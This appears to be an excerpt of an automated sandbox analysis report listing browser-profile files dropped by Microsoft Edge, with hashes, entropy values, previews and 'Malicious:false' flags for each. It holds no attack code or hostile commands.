                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                  Entropy (8bit):5.566063713502838
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:W2d9RQWG/W5wA2f4QH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPDbIvsG2rwXe+p0tW:WYzQx/WaA2fFHu1jaaubTO1tW
                                                                                                                                                                                                                  MD5:211A36A5AEB953DB50145EAD4B20FC0F
                                                                                                                                                                                                                  SHA1:11FE33220D8427EFBB7E31E0E401EA667779B745
                                                                                                                                                                                                                  SHA-256:55FB866713106BCB1BF1038C52D279F8D399FA42E92A6EB68439AE434455F605
                                                                                                                                                                                                                  SHA-512:AB90FE82D199CA97E7BD910F554DA374EE24DCE5CD8327D3535248EE3A43514989040BF46D0FDC962D7470E800246A0816E985A732B47C7B8854B5082AA3C7DC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379025968289386","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379025968289386","location":5,"ma

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):213
                                                                                                                                                                                                                  Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                                  MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                                  SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
                                                                                                                                                                                                                  SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                                  SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.112643276287564
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQgMQL+q2PN723oH+TcwtrQMxIFUt8OPQ4vGKWZmw+OPQuQLVkwON723oH+TcwJ:7oZQ+vVaYebCFUt8Oo4vGKW/+OouQV5b
                                                                                                                                                                                                                  MD5:9AAC2AF1E39F0265414CF91C9E3D4918
                                                                                                                                                                                                                  SHA1:A88048B0028C15305132DAC8C10D399B0F945CB6
                                                                                                                                                                                                                  SHA-256:159EAC84977A63DE308E5BC7EC83BB6D4320D46CFA4856C2016FE10D80F6D0D4
                                                                                                                                                                                                                  SHA-512:7A6E6FC2BAE6C4362FE9E4B875EC35112F611F0D683F1248FF5F97F4DB7E8F91C190892914764463E00A9C4628BF2D1645FA7D4FDE34D244868E228A59AA21FA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.406 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/18-15:06:09.407 1eec Recovering log #3.2024/12/18-15:06:09.409 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.112643276287564
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQgMQL+q2PN723oH+TcwtrQMxIFUt8OPQ4vGKWZmw+OPQuQLVkwON723oH+TcwJ:7oZQ+vVaYebCFUt8Oo4vGKW/+OouQV5b
                                                                                                                                                                                                                  MD5:9AAC2AF1E39F0265414CF91C9E3D4918
                                                                                                                                                                                                                  SHA1:A88048B0028C15305132DAC8C10D399B0F945CB6
                                                                                                                                                                                                                  SHA-256:159EAC84977A63DE308E5BC7EC83BB6D4320D46CFA4856C2016FE10D80F6D0D4
                                                                                                                                                                                                                  SHA-512:7A6E6FC2BAE6C4362FE9E4B875EC35112F611F0D683F1248FF5F97F4DB7E8F91C190892914764463E00A9C4628BF2D1645FA7D4FDE34D244868E228A59AA21FA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.406 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/18-15:06:09.407 1eec Recovering log #3.2024/12/18-15:06:09.409 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379025970802523

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1287
                                                                                                                                                                                                                  Entropy (8bit):3.667046836594888
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:3njvEmxPGPdt1zo4RC5VjAkIIFUJoaHWet1zoH:3njruPhxAAkIIOoLY2
                                                                                                                                                                                                                  MD5:8884D248A782B4E61AB1A4731CD2E2C5
                                                                                                                                                                                                                  SHA1:3F45C07C15D0BB7763DDC073E834CD757112FB5E
                                                                                                                                                                                                                  SHA-256:DC2208AD0259FC7795A8819F07F546F3066A4BBC549213F15C0FCD1E35A8AB1E
                                                                                                                                                                                                                  SHA-512:20296CAE5523A20D3A1F65336C112C94DE648EEAF64C60D104B90DDD5053C662EAA5177FE38EA5FE2859A8060A6BFF0012A38FC89C353C22E06F0FF4E1A98F2D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SNSS......../.J............/.J......"./.J............/.J......../.J......../.J......../.J....!.../.J................................/.J./.J1..,..../.J$...fcf98dd2_ba55_4157_8169_91e0109d6dcf..../.J......../.J....>o}........./.J..../.J......................../.J....................5..0..../.J&...{46F3A197-DB49-410A-81B3-94975C835573}....../.J......../.J.......|..../.J....7...file:///C:/Users/user/AppData/Roaming/New_2025.webp.............!...........................................................................................................)......)..@.......X...............P.......................................................v...7...f.i.l.e.:./././.C.:./.U.s.e.r.s./.e.n.g.i.n.e.e.r./.A.p.p.D.a.t.a./.R.o.a.m.i.n.g./.N.e.w._.2.0.2.5...w.e.b.p...................................8.......0.......8....................................................................... .......................................................P...$...b.7.4.b.3.4.e.c.-.d.9.a.c.-.4.5.4.4.-.b.b.f.2.-.0.9

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):356
                                                                                                                                                                                                                  Entropy (8bit):5.1268297786509605
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQEvAq2PN723oH+Tcwt7Uh2ghZIFUt8OPQWhZmw+OPQBzkwON723oH+Tcwt7Uh9:7oEvAvVaYebIhHh2FUt8OoS/+Ooh5Oa0
                                                                                                                                                                                                                  MD5:244F4D5470C20E104CD35AB3389FDF8D
                                                                                                                                                                                                                  SHA1:116DF5AB87344E9C2DB4AE9389698508B0C75BA5
                                                                                                                                                                                                                  SHA-256:C355A878AE8CAF1DB0C94B75C68524ACB42AB5CB9DB6F0C05701A619DE0EFD23
                                                                                                                                                                                                                  SHA-512:8CCEE9E59717126BCC399785FD6FFCFD9227B1E6674C8AF2D7AD9D414E8705BDD849F184CE97C14614501EA714F94F39A6511836D8F5066BFC285C74ED620221
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.289 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-15:06:08.467 1e20 Recovering log #3.2024/12/18-15:06:08.468 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):356
                                                                                                                                                                                                                  Entropy (8bit):5.1268297786509605
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQEvAq2PN723oH+Tcwt7Uh2ghZIFUt8OPQWhZmw+OPQBzkwON723oH+Tcwt7Uh9:7oEvAvVaYebIhHh2FUt8OoS/+Ooh5Oa0
                                                                                                                                                                                                                  MD5:244F4D5470C20E104CD35AB3389FDF8D
                                                                                                                                                                                                                  SHA1:116DF5AB87344E9C2DB4AE9389698508B0C75BA5
                                                                                                                                                                                                                  SHA-256:C355A878AE8CAF1DB0C94B75C68524ACB42AB5CB9DB6F0C05701A619DE0EFD23
                                                                                                                                                                                                                  SHA-512:8CCEE9E59717126BCC399785FD6FFCFD9227B1E6674C8AF2D7AD9D414E8705BDD849F184CE97C14614501EA714F94F39A6511836D8F5066BFC285C74ED620221
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.289 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-15:06:08.467 1e20 Recovering log #3.2024/12/18-15:06:08.468 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                  Entropy (8bit):5.220741195740046
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7oqi+vVaYebvqBQFUt8Ooxk/+OorV5OaYebvqBvJ:7o6VaYebvZg8OoxkojOaYebvk
                                                                                                                                                                                                                  MD5:C70808EFC3D8E4C5DB6DD5D408DEA671
                                                                                                                                                                                                                  SHA1:3010A1606E8004ED5A54B54B98CA84EE026BA22C
                                                                                                                                                                                                                  SHA-256:16013CC269B9E4945622451A95CDF783F5387AEB8B6FAB718D5A500D03758FAE
                                                                                                                                                                                                                  SHA-512:3A296BB5779CF0C1632E7AB7C834C17807FB523CCA5929E64646EEE3C63D4C07589E3FA47F41C0604C33C26E9A01C264DBA306A216B5DE29C9DF7C8382FED590
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.418 1f0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:06:09.420 1f0c Recovering log #3.2024/12/18-15:06:09.423 1f0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                  Entropy (8bit):5.220741195740046
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7oqi+vVaYebvqBQFUt8Ooxk/+OorV5OaYebvqBvJ:7o6VaYebvZg8OoxkojOaYebvk
                                                                                                                                                                                                                  MD5:C70808EFC3D8E4C5DB6DD5D408DEA671
                                                                                                                                                                                                                  SHA1:3010A1606E8004ED5A54B54B98CA84EE026BA22C
                                                                                                                                                                                                                  SHA-256:16013CC269B9E4945622451A95CDF783F5387AEB8B6FAB718D5A500D03758FAE
                                                                                                                                                                                                                  SHA-512:3A296BB5779CF0C1632E7AB7C834C17807FB523CCA5929E64646EEE3C63D4C07589E3FA47F41C0604C33C26E9A01C264DBA306A216B5DE29C9DF7C8382FED590
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.418 1f0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:06:09.420 1f0c Recovering log #3.2024/12/18-15:06:09.423 1f0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\3163f648-dda6-42f5-86a9-2972359a125d.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\34631504-42d4-429a-998c-a8a7955dccdc.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3a9ed.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3ab64.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\aaeadc3a-3eb0-4192-a60f-cd5687434882.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
